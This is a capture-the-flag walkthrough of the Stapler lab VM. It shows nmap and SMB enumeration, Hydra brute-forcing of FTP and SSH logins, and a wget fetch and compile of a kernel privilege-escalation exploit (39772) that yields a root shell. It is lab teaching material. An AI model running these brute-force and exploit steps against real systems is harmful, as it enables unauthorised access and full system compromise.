Lab – Stapler – part 1

Let’s move on to this labs. This time is a Stapler by a g0tmi1k. Yeah, “You see Bob, it’s not that I’m lazy, it’s that I just don’t care” 

Stapler is an intermediate machine with a couple of interesting twists. Here we go.

Virtual machine boots and all we got is a login screen:

Let’s enumerate our target:

root@kali:~# nmap -sV -sC -O -A 192.168.89.151
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-14 04:28 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 192.168.89.151
Host is up (0.00054s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to 192.168.89.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid: 
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings: 
| NULL: 
| message2.jpgUT 
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.26-0ubuntu0.16.04.1
| mysql-info: 
| Protocol: 10
| Version: 5.7.26-0ubuntu0.16.04.1
| Thread ID: 5
| Capabilities flags: 63487
| Some Capabilities: SupportsLoadDataLocal, ConnectWithDatabase, Support41Auth, LongPassword, Speaks41ProtocolOld, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolNew, SupportsTransactions, InteractiveClient, SupportsCompression, LongColumnFlag, FoundRows, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: k+\x12RsDVT_\x07\x1A;m*K=Lx\x0Db
|_ Auth Plugin Name: 96
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=5/14%Time=5CDA7C56%P=x86_64-pc-linux-gnu%r(NUL
SF:L,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 00:0C:29:87:E1:F6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m58s, deviation: 34m37s, median: 2h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2019-05-14T12:29:21+01:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2019-05-14 07:29:21
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.89.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.82 seconds

What do we have so far:

• FTP server with vsftpd 2.0.8;
• ssh OpenSSH 7.2p2;
• Dns dnsmasq 2.75;
• web server PHP cli server 5.5;
• netbios-ssn Samba smbd 4.3.11-Ubuntu;
• Doom!!
• MySQL 5.7.26

I poked around and found nothing promising. Web server didn’t respond properly, and smb share without any credentials was also useless:

root@kali:~# smbclient -N -L \\192.168.89.151

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP RED

Ok, now we have a couple of names – Fred and Kathy. It isn’t much.

Let’s take a try anonymous ftp access:

root@kali:~# ftp 192.168.89.151
Connected to 192.168.89.151.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.89.151:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Harry, who’s Harry? Anyway we got an access, let’s look around.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.07 secs (1.4184 kB/s)
ftp> exit
221 Goodbye.

There’s file called “note” here that we can get. It reads:

root@kali:~# cat note 
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

So we also have Elly and John. And seems that Elly has some privileged access to update something. But anyway we have no access to her FTP account. Once again, it’s a trial and error thing. We can try and bruteforce Elly’s account, since it’s looks relevant in this scenario:

root@kali:~# hydra -l elly -p rockyou.txt -e nsr ftp://192.168.89.151
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-14 06:53:52
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ftp://192.168.89.151:21/
[21][ftp] host: 192.168.89.151 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-05-14 06:53:56

So Elly’s password is just her login spelled backwards. Cool, now can got back to ftp server with Elly’s credentials. This time we have way more privileges. For some unknown reason Elly’s directory is mapped to /etc:

root@kali:~# ftp 192.168.89.151
Connected to 192.168.89.151.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.89.151:root): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11
drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 2016 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db
drwxr-xr-x 2 0 0 4096 Apr 25 07:42 alternatives
drwxr-xr-x 8 0 0 4096 Apr 25 07:47 apache2
drwxr-xr-x 3 0 0 4096 Apr 25 07:48 apparmor
drwxr-xr-x 9 0 0 4096 May 14 12:20 apparmor.d
drwxr-xr-x 3 0 0 4096 Apr 25 07:48 apport
drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt
-rw-r----- 1 0 1 144 Jan 14 2016 at.deny
drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind
-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 bash_completion.d
-rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist
drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates
-rw-r--r-- 1 0 0 8464 Apr 25 07:48 ca-certificates.conf
-rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf.dpkg-old
drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 cron.daily
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly
-rw-r--r-- 1 0 0 722 Apr 24 16:04 crontab
-rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab
drwxr-xr-x 2 0 0 4096 Jun 04 2016 dbconfig-common
drwxr-xr-x 4 0 0 4096 Apr 25 07:47 dbus-1
-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
drwxr-xr-x 3 0 0 4096 Apr 25 07:48 default
-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 depmod.d
drwxr-xr-x 4 0 0 4096 Apr 25 07:48 dhcp
-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:45 dnsmasq.d
drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg
-rw-r--r-- 1 0 0 96 Apr 20 2016 environment
drwxr-xr-x 4 0 0 4096 Apr 25 07:48 fonts
-rw-r--r-- 1 0 0 594 Jun 03 2016 fstab
-rw-r--r-- 1 0 0 132 Feb 11 2016 ftpusers
-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf
-rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf
-rw-rw-r-- 1 0 0 1253 Jun 04 2016 group
-rw------- 1 0 0 1240 Jun 03 2016 group-
drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d
-rw-r----- 1 0 42 1004 Jun 04 2016 gshadow
-rw------- 1 0 0 995 Jun 03 2016 gshadow-
drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss
-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf
-rw-r--r-- 1 0 0 12 Jun 03 2016 hostname
-rw-r--r-- 1 0 0 469 Jun 05 2016 hosts
-rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow
-rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny
-rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf
drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d
drwxr-xr-x 2 0 0 4096 May 14 12:20 init
drwxr-xr-x 2 0 0 4096 May 14 12:20 init.d
drwxr-xr-x 5 0 0 4096 Apr 25 07:47 initramfs-tools
-rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv
-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 insserv.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi
-rw-r--r-- 1 0 0 345 May 14 12:16 issue
-rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net
drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd
drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel
-rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf
-rw-r--r-- 1 0 0 27162 May 14 12:20 ld.so.cache
-rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 ld.so.conf.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 ldap
-rw-r--r-- 1 0 0 267 Oct 22 2015 legal
-rw-r--r-- 1 0 0 191 Jan 19 2016 libaudit.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:49 libnl-3
drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd
-rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias
-rw-r--r-- 1 0 0 9149 Apr 25 07:47 locale.gen
lrwxrwxrwx 1 0 0 33 Apr 25 07:48 localtime -> /usr/share/zoneinfo/Europe/London
drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck
-rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs
-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf
drwxr-xr-x 2 0 0 4096 May 14 12:20 logrotate.d
-rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release
drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm
-r--r--r-- 1 0 0 33 Jun 03 2016 machine-id
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime
-rw-r--r-- 1 0 0 2656 Apr 25 07:47 mailcap
-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order
drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm
-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types
-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 modprobe.d
-rw-r--r-- 1 0 0 195 Apr 20 2016 modules
drwxr-xr-x 2 0 0 4096 Apr 25 07:43 modules-load.d
lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts
drwxr-xr-x 4 0 0 4096 May 14 12:20 mysql
drwxr-xr-x 7 0 0 4096 Jun 03 2016 network
-rw-r--r-- 1 0 0 91 Oct 22 2015 networks
drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt
-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf
drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt
lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release
-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf
-rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 pam.d
-rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd
-rw------- 1 0 0 2869 Jun 03 2016 passwd-
drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl
drwxr-xr-x 3 0 0 4096 Jun 03 2016 php
drwxr-xr-x 3 0 0 4096 Apr 25 07:50 phpmyadmin
drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm
drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1
drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp
-rw-r--r-- 1 0 0 575 Oct 22 2015 profile
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 profile.d
-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 python2.7
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 python3.5
-rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc0.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc2.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc3.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc4.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc5.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:50 rc6.d
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 rcS.d
-rw-r--r-- 1 0 0 62 May 14 14:54 resolv.conf
drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf
-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt
-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc
-rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d
drwxr-xr-x 3 0 0 4096 May 14 12:16 samba
-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc
-rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty
drwxr-xr-x 4 0 0 4096 Jun 03 2016 security
drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux
-rw-r--r-- 1 0 0 19605 Oct 25 2014 services
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml
-rw-r----- 1 0 42 4518 Jun 05 2016 shadow
-rw------- 1 0 0 1873 Jun 03 2016 shadow-
-rw-r--r-- 1 0 0 125 Apr 25 07:48 shells
drwxr-xr-x 2 0 0 4096 Apr 25 07:42 skel
-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 ssh
drwxr-xr-x 4 0 0 4096 Apr 25 07:48 ssl
-rw-r--r-- 1 0 0 644 Jun 04 2016 subgid
-rw------- 1 0 0 625 Jun 03 2016 subgid-
-rw-r--r-- 1 0 0 644 Jun 04 2016 subuid
-rw------- 1 0 0 625 Jun 03 2016 subuid-
-r--r----- 1 0 0 769 Jun 05 2016 sudoers
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d
-rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf
drwxr-xr-x 2 0 0 4096 Apr 25 07:47 sysctl.d
drwxr-xr-x 5 0 0 4096 Apr 25 07:43 systemd
drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo
-rw-r--r-- 1 0 0 14 Apr 25 07:48 timezone
drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d
-rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf
drwxr-xr-x 4 0 0 4096 Apr 25 07:47 udev
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 vim
drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools
-rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list
-rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list
lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc
drwxr-xr-x 4 0 0 4096 Apr 25 07:45 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml
drwxr-xr-x 2 0 0 4096 Apr 25 07:48 zsh
226 Directory send OK.
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 0.00 secs (4.7245 MB/s)
ftp> quit
221 Goodbye.

We can grab the passwd file and try to use it against SSH. Who knows, maybe some user with high clearance also has simple password:

root@kali:~# hydra -L passwd -e nsr -t 4 192.168.89.151 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-14 07:15:39
[DATA] max 4 tasks per 1 server, overall 4 tasks, 183 login tries (l:61/p:3), ~46 tries per task
[DATA] attacking ssh://192.168.89.151:22/
[STATUS] 59.00 tries/min, 59 tries in 00:01h, 124 to do in 00:03h, 4 active
[22][ssh] host: 192.168.89.151 login: SHayslett password: SHayslett
[STATUS] 56.50 tries/min, 113 tries in 00:02h, 70 to do in 00:02h, 4 active
[STATUS] 57.33 tries/min, 172 tries in 00:03h, 11 to do in 00:01h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-05-14 07:18:54

Here’s another one. SHayslett has a password SHayslett. Let’s use it connect via SSH:

root@kali:~# ssh SHayslett@192.168.89.151
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.89.151's password: 
Welcome back!


SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
SHayslett@red:~$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
SHayslett@red:~$ 

We’re in. Unfortunately, this SHayslett has no administrative rights. But linux kernel here looks outdated. Let’s search for a compatible exploit:

root@kali:~# searchsploit 4.4.x
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                      | exploits/linux/local/39772.txt
ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion                                                                                   | exploits/php/webapps/6916.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# 

There’s one for privilege escalation – 39772. We can visit https://www.exploit-db.com for details, but for now let’s just download it

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

and unzip it. We have a folder with an exploit sourcecode and script that compiles it. Let’s the script and the exploit:

SHayslett@red:~/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh 
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c fuse_mount hello hello.c suidhelper suidhelper.c
SHayslett@red:~/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput 
suid file detected, launching rootshell...
we have root privs now...
root@red:~/39772/ebpf_mapfd_doubleput_exploit# starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.

Yep, we’ve got our root now.

root@red:~/39772/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)

Let’ s got to root’s directory for the flag:

root@red:~/39772/ebpf_mapfd_doubleput_exploit# cd /root/
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt 
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                           .-'''''-.
                           |'-----'|
                           |-.....-|
                           |       |
                           |       |
          _,._             |       |
     __.o`  o`"-.          |       |
 .-O o  `"- .o O )_,._     |       |
(  o  O  o )--.-"`O  o"-.  `'-----'`
 '--------'  (  o O     o) 
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Ha, here’s our flag, cookies and glass of something. We got from anonymous to root here, good work. But this isn’t over. Next time we’ll return to this machine and see what we could miss.